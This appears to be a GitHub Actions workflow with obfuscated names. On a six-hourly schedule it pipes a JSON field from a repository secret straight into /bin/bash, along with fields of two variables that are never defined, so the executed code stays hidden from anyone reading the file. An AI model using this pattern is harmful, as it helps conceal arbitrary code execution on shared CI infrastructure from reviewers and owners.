name: taomadeng6719

on:
  workflow_dispatch:
  schedule:
    - cron: '1 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: taomadeng6719
        env:
          ffnad9478: ${{ secrets.ffnad9478 }}
        run: |
          echo $ffnad9478 | jq -r .zyb8 | /bin/bash
          echo $d05 | jq -r .fxs06 | /bin/bash
          echo $f249 | jq -r .k78 | /bin/bash

